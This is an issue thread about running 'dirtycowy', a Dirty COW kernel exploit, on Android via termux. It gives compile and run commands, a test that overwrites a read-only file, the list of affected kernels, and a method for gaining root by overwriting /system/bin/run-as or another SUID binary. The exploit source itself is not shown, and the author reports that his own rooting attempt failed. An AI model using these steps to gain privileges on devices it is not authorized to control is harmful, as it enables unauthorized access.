how can i run it on android device?

[MatanTubul]

i am trying to run it on termux bot got the following error: error opening new_content_file

[igrek51]

First, you should compile it on your device architecture. You can do that with gcc on termux:

1. Install gcc on termux: apt install clang
2. Compile dirtycowy.c (in src/ folder): gcc -pthread dirtycowy.c -o dirtycowy

Then you can run some test: create some file which will be overwritten: echo 'readonly' > readonly make it read-only (ie. by root): chmod 444 readonly check if its read-only: ls -l readonly create some file with new data which overwrite the old file content: echo 'dirtdirt' > dirty-data check file content (you should see 'readonly'): cat readonly OVERWRITE: dirtycowy overwrite readonly dirtdirt check file content again (you should see 'dirtdirt'): cat readonly

[MatanTubul]

i already compile it. after that i try to run it on the "rus-as" file that you provided, but then i got the error below.

1. does this program can give me a root access?
2. does it work on android 7.0

[igrek51]

Take a look for some info about Dirty Cow, my program is based on one of these exploits: https://dirtycow.ninja/

1. In theory yes: If you overwrite some system binary file (with SUID flag) with your run-as binary (which is setting current user to root) and you execute it, it should give you a root access. But on some devices (especially mine - Samsung SM-G530) there wasn't any file with SUID flag (which is necessary to escalate privileges). On my device I only succeeded in overwriting system configuration read-only files (which is also a powerfull tool).

2. It depends only on linux kernel version. This exploit should works only on kernels released before Oct 18, 2016. You can check your kernel version entering in termux: cat /proc/version

[MatanTubul]

i have nexus 6p with android 7.1.1 with kernel version 3.10.73.

[igrek51]

kernel 3.10.73 was released in March 2015, so your kernel is affected by Dirty COW bug

[MatanTubul]

Do you have any idea which system file i can overwrite? i get the following output:

Checking overwriting status on
[warn] new file size (9706) and old file size (0) differ
Uwaga, napierdalam dirty cow...
[ERROR] error opening new_content_file
.
.
.

[igrek51]

I was trying to overwrite file /system/bin/run-as, but as I said: I succeeded in overwriting it, but failed to switch to root when executing it. I have not solved this problem yet. This might have been a method to temporarily switch to root without permanently rooting the device (which makes warranty void). I thought that Dirty Cow bug was a great chance to do that, but now I know it's not so easy, especially on every Android device.

The program dirtycowy overwrites files with new content, but both file sizes should be equal. However there was included some trick which allows to work with a SLIGHTLY different filesizes (that's why there is a warning message). I suppose that in your case it failed because the overwritten file has no bytes to overwrite (size 0). Dirty Cow can overwrite existing bytes, not write or append any data to a file.

I advise you to read more about Dirty COW mechanism and be careful what you do, especially when overwriting system files. The mysterious message Uwaga, napierdalam dirty cow... means Be careful, executing dirty cow...